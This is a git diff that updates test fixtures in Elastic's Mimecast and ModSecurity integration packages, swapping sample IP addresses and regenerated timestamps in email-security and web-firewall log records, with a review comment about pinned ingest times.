\u003cjohndoejr@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe Jr\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cEE7E97EA-1926-4A90-9399-D049A98893F4@emailsec.ninja\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG", "created": 
"2021-10-15T17:10:46+0000"
 },
@@ -60,19 +60,19 @@ }, "related": { "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "rule": { "name": "IP - 1 hit (Tag email)" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "none", - "ingested": "2021-11-25T11:34:15.002445300Z", - "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs\",\"senderAddress\":\"johndoe@gmail.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Fwd: Here ya go\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"8.8.8.8\",\"eventTime\":\"2021-10-15T06:16:34+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe \u003cjohndoe@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cCAOsCE-eP_fM6j=OL7Mwufic_s8t8VgNaCWdWM+sHYvWAFxiDig@mail.gmail.com\u003e\"}", + "ingested": "2021-12-09T15:16:07.465645200Z", + "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs\",\"senderAddress\":\"johndoe@gmail.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Fwd: Here ya go\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T06:16:34+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe \u003cjohndoe@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cCAOsCE-eP_fM6j=OL7Mwufic_s8t8VgNaCWdWM+sHYvWAFxiDig@mail.gmail.com\u003e\"}", "id": 
"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs",
 "created": "2021-10-15T06:16:34+0000"
 },
@@ -113,19 +113,19 @@ }, "related": { "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "rule": { "name": "IP - 2 hits (Hold for Review / User Hold)" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "hold", - "ingested": "2021-11-25T11:34:15.002446500Z", - "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc\",\"senderAddress\":\"johndoe@mimecast.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"RE: MSP Sales of Managed E2E\",\"definition\":\"IP - 2 hits (Hold for Review \\/ User Hold)\",\"hits\":2,\"identifiers\":[\"targeted_threat_dictionary\",\"internal_user_name\"],\"action\":\"hold\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"8.8.8.8\",\"eventTime\":\"2021-10-13T16:12:07+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"Emily Doe \u003cemilydoe@example.com\u003e\",\"stringSimilarToDomain\":\"Emily Doe\",\"checkerResult\":\"hit\"},{\"impersonationDomainSource\":\"targeted_threat_dictionary\",\"stringSimilarToDomain\":\"who\"}],\"messageId\":\"\u003cPR3P194MB06183A3BE81F0831A8402B47D3B79@PR3P194MB0618.EURP194.PROD.OUTLOOK.COM\u003e\"}", + "ingested": "2021-12-09T15:16:07.465651500Z", + "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc\",\"senderAddress\":\"johndoe@mimecast.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"RE: MSP Sales of Managed E2E\",\"definition\":\"IP - 2 hits (Hold for Review \\/ User Hold)\",\"hits\":2,\"identifiers\":[\"targeted_threat_dictionary\",\"internal_user_name\"],\"action\":\"hold\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-13T16:12:07+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"Emily Doe 
\u003cemilydoe@example.com\u003e\",\"stringSimilarToDomain\":\"Emily Doe\",\"checkerResult\":\"hit\"},{\"impersonationDomainSource\":\"targeted_threat_dictionary\",\"stringSimilarToDomain\":\"who\"}],\"messageId\":\"\u003cPR3P194MB06183A3BE81F0831A8402B47D3B79@PR3P194MB0618.EURP194.PROD.OUTLOOK.COM\u003e\"}",
 "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc",
 "created": "2021-10-13T16:12:07+0000"
 },
diff --git a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log
index 796ea428c70..b35bd7a7a6a 100644
--- a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log
+++ b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log
@@ -1,3 +1,3 @@
-{"userEmailAddress": "johndoe@example.com", "fromUserEmailAddress": "bestbuyinfo@emailinfo.bestbuy.com", "url": "https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d", "ttpDefinition": "Inbound URL 'Aggressive'", "subject": "Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.", "action": "allow", "adminOverride": "N/A", "userOverride": "None", "scanResult": "clean", "category": "Business", "sendingIp": "8.8.8.8", "userAwarenessAction": "Continue", "date": "2021-10-16T14:45:34+0000", "actions": "Allow", "route": "inbound", "creationMethod": "User Click", "emailPartsDescription": [ "Body" ], "messageId": "<31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local>" }
-{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"noreply@r.livingsocial.com","url":"https:\/\/www.livingsocial.com\/browse\/?locale=en_US&topCategory=all-deals&p=14&utm_source=newsletter_im&utm_medium=email&t_division=boston&date=20211016&uu=1bea09ca-8a29-11e9-b7f7-0242ac120002&CID=US&tx=0&s=body&c=banner&d=dynamic-banner-4&utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0","ttpDefinition":"Inbound URL 'Aggressive'","subject":"Jump Pass + Mega Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Business","sendingIp":"8.8.8.8","userAwarenessAction":"Continue","date":"2021-10-16T14:07:38+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1>"}
-{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"nflshop.com@eml.nflshop.com","url":"https:\/\/www.nflshop.com\/how-can-i-contact-customer-service\/ch-2244","ttpDefinition":"Inbound URL 'Aggressive'","subject":"25% Off Tees to Give During Early Gifting
Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Fashion & Beauty","sendingIp":"8.8.8.8","userAwarenessAction":"Continue","date":"2021-10-16T13:31:56+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local>"}
\ No newline at end of file
+{"userEmailAddress": "johndoe@example.com", "fromUserEmailAddress": "bestbuyinfo@emailinfo.bestbuy.com", "url": "https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d", "ttpDefinition": "Inbound URL 'Aggressive'", "subject": "Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.", "action": "allow", "adminOverride": "N/A", "userOverride": "None", "scanResult": "clean", "category": "Business", "sendingIp": "67.43.156.15", "userAwarenessAction": "Continue", "date": "2021-10-16T14:45:34+0000", "actions": "Allow", "route": "inbound", "creationMethod": "User Click", "emailPartsDescription": [ "Body" ], "messageId": "<31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local>" }
+{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"noreply@r.livingsocial.com","url":"https:\/\/www.livingsocial.com\/browse\/?locale=en_US&topCategory=all-deals&p=14&utm_source=newsletter_im&utm_medium=email&t_division=boston&date=20211016&uu=1bea09ca-8a29-11e9-b7f7-0242ac120002&CID=US&tx=0&s=body&c=banner&d=dynamic-banner-4&utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0","ttpDefinition":"Inbound URL 'Aggressive'","subject":"Jump Pass + Mega Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Business","sendingIp":"67.43.156.15","userAwarenessAction":"Continue","date":"2021-10-16T14:07:38+0000","actions":"Allow","route":"inbound","creationMethod":"User
Click","emailPartsDescription":["Body"],"messageId":"<803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1>"}
+{"userEmailAddress":"johndoe@example.com","fromUserEmailAddress":"nflshop.com@eml.nflshop.com","url":"https:\/\/www.nflshop.com\/how-can-i-contact-customer-service\/ch-2244","ttpDefinition":"Inbound URL 'Aggressive'","subject":"25% Off Tees to Give During Early Gifting Sale","action":"allow","adminOverride":"N\/A","userOverride":"None","scanResult":"clean","category":"Fashion & Beauty","sendingIp":"67.43.156.15","userAwarenessAction":"Continue","date":"2021-10-16T13:31:56+0000","actions":"Allow","route":"inbound","creationMethod":"User Click","emailPartsDescription":["Body"],"messageId":"<28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local>"}
\ No newline at end of file
diff --git a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json
index baa890b2ad9..ed7f5ccbef8 100644
--- a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json
+++ b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json
@@ -5,7 +5,7 @@
 "name": "Inbound URL 'Aggressive'"
 },
 "source": {
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d"
@@ -23,13 +23,13 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "event": { "action": "Continue", - "ingested": "2021-11-25T11:34:15.770244300Z", - "original": "{\"userEmailAddress\": \"johndoe@example.com\", \"fromUserEmailAddress\": \"bestbuyinfo@emailinfo.bestbuy.com\", \"url\": \"https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d\", \"ttpDefinition\": \"Inbound URL 'Aggressive'\", \"subject\": \"Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.\", \"action\": \"allow\", \"adminOverride\": \"N/A\", \"userOverride\": \"None\", \"scanResult\": \"clean\", \"category\": \"Business\", \"sendingIp\": \"8.8.8.8\", \"userAwarenessAction\": \"Continue\", \"date\": \"2021-10-16T14:45:34+0000\", \"actions\": \"Allow\", \"route\": \"inbound\", \"creationMethod\": \"User Click\", \"emailPartsDescription\": [ \"Body\" ], \"messageId\": \"\u003c31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local\u003e\" }", + "ingested": "2021-12-09T15:16:07.699281Z", + "original": "{\"userEmailAddress\": \"johndoe@example.com\", \"fromUserEmailAddress\": \"bestbuyinfo@emailinfo.bestbuy.com\", \"url\": \"https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d\", \"ttpDefinition\": \"Inbound URL 'Aggressive'\", \"subject\": \"Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.\", \"action\": \"allow\", \"adminOverride\": \"N/A\", \"userOverride\": \"None\", \"scanResult\": \"clean\", \"category\": \"Business\", \"sendingIp\": \"67.43.156.15\", \"userAwarenessAction\": \"Continue\", \"date\": \"2021-10-16T14:45:34+0000\", \"actions\": \"Allow\", \"route\": \"inbound\", \"creationMethod\": \"User Click\", \"emailPartsDescription\": [ \"Body\" ], \"messageId\": 
\"\u003c31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local\u003e\" }", "created": "2021-10-16T14:45:34+0000" }, "user": { @@ -63,7 +63,7 @@ "name": "Inbound URL 'Aggressive'" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "url": { "original": "https://www.livingsocial.com/browse/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0" 
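Review bot: The regenerated expected output pins `event.ingested` to a wall-clock value (`"ingested": "2021-12-09T15:16:07.699281Z"` in this hunk, and again in the hunks at `@@ -81,13` and `@@ -139,13`), so any future regeneration of this file will touch these lines even when the pipeline is unchanged, which is exactly what happened here alongside the intended `8.8.8.8` → `67.43.156.15` change. If the elastic-package version in use honours a `dynamic_fields` entry in the pipeline test config, `event.ingested` is the natural field to mark there so that only real pipeline output changes show up in review. The new `source.ip` / `related.ip` values do agree with `sendingIp` inside `event.original`, which is the consistency check that matters for this fixture.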
@@ -81,13 +81,13 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "event": { "action": "Continue", - "ingested": "2021-11-25T11:34:15.770246800Z", - "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"noreply@r.livingsocial.com\",\"url\":\"https:\\/\\/www.livingsocial.com\\/browse\\/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"Jump Pass + Mega Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Business\",\"sendingIp\":\"8.8.8.8\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T14:07:38+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1\u003e\"}", + "ingested": "2021-12-09T15:16:07.699289800Z", + "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"noreply@r.livingsocial.com\",\"url\":\"https:\\/\\/www.livingsocial.com\\/browse\\/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"Jump Pass + Mega 
Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Business\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T14:07:38+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1\u003e\"}", "created": "2021-10-16T14:07:38+0000" }, "user": { @@ -121,7 +121,7 @@ "name": "Inbound URL 'Aggressive'" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "url": { "original": "https://www.nflshop.com/how-can-i-contact-customer-service/ch-2244" 
@@ -139,13 +139,13 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "event": { "action": "Continue", - "ingested": "2021-11-25T11:34:15.770247900Z", - "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"nflshop.com@eml.nflshop.com\",\"url\":\"https:\\/\\/www.nflshop.com\\/how-can-i-contact-customer-service\\/ch-2244\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"25% Off Tees to Give During Early Gifting Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Fashion \u0026 Beauty\",\"sendingIp\":\"8.8.8.8\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T13:31:56+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local\u003e\"}", + "ingested": "2021-12-09T15:16:07.699295800Z", + "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"nflshop.com@eml.nflshop.com\",\"url\":\"https:\\/\\/www.nflshop.com\\/how-can-i-contact-customer-service\\/ch-2244\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"25% Off Tees to Give During Early Gifting Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Fashion \u0026 Beauty\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T13:31:56+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local\u003e\"}", "created": "2021-10-16T13:31:56+0000" }, "user": { diff --git a/packages/mimecast/manifest.yml b/packages/mimecast/manifest.yml index 7f634de1bd0..d2b7686c1e5 100644 --- a/packages/mimecast/manifest.yml +++ b/packages/mimecast/manifest.yml 
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: mimecast
 title: "Mimecast"
-version: 0.0.2
+version: 0.0.3
 license: basic
 description: "Fetching logs from Mimecast API and ingest into Elasticsearch"
 type: integration
diff --git a/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log b/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log
index 00c1bf37a1a..d6947361e58 100644
--- a/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log
+++ b/packages/modsecurity/_dev/deploy/docker/sample_logs/modsec-audit.log
@@ -4,11 +4,11 @@ {"transaction":{"client_ip":"51.81.186.254","time_stamp":"Fri May 14 14:46:53 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":56627,"host_ip":"51.81.186.254","host_port":443,"id":"162100361322.069228","request":{"method":"GET","http_version":1.1,"uri":"/customers/properties?trip_id=0","headers":{"Host":"www.owayride.com","Authorization":"a062a8301dea86879ee7bb3c2115705f420c10aebb1279c504396736d7ae9489","Content-Type":"application/json","Connection":"keep-alive","Accept":"*/*","User-Agent":"Oway Ride/7.0.27 (com.owaycabs.passenger; build:200116; iOS 14.4.2) Alamofire/4.9.0","Accept-Language":"en-MM;q=1.0, my-MM;q=0.9","Accept-Encoding":"gzip;q=1.0, compress;q=0.5"}},"response":{"http_code":500,"headers":{"X-Runtime":"2.583300","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Vary":"Origin","Status":"500 Internal Server Error","X-Request-Id":"d77491f3-7bf4-4753-b474-01c68daa1a84","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Content-Length":"1477","Date":"Fri, 14 May 2021 14:46:55 GMT","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"210.14.100.32","time_stamp":"Fri May 14 14:49:05 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":27034,"host_ip":"210.14.100.32","host_port":443,"id":"162100374575.622721","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2762450/finish","headers":{"Authorization":"694293942460dee77c1a7d11c01adc3ba66b0b44b3ae7dab5f79a422a5e464ba","Host":"www.owayride.com","Content-Type":"application/json; 
charset=UTF-8","Content-Length":"1074","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 14:49:06 GMT","Server":"nginx/1.14.0","X-Request-Id":"11b01166-6955-4458-9506-492ed3cc276c","X-Download-Options":"noopen","X-Runtime":"0.176057","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"128.14.80.81","time_stamp":"Fri May 14 14:49:13 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":49618,"host_ip":"128.14.80.81","host_port":443,"id":"162100375347.540524","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2762450/finish","headers":{"Authorization":"694293942460dee77c1a7d11c01adc3ba66b0b44b3ae7dab5f79a422a5e464ba","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1074","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 14:49:13 
GMT","Server":"nginx/1.14.0","X-Request-Id":"35c798ee-6446-432a-8b10-bc50937cf9a6","X-Download-Options":"noopen","X-Runtime":"0.156531","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} -{"transaction":{"client_ip":"176.58.101.217","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"176.58.101.217","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
)","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.14","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"67.43.156.14","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
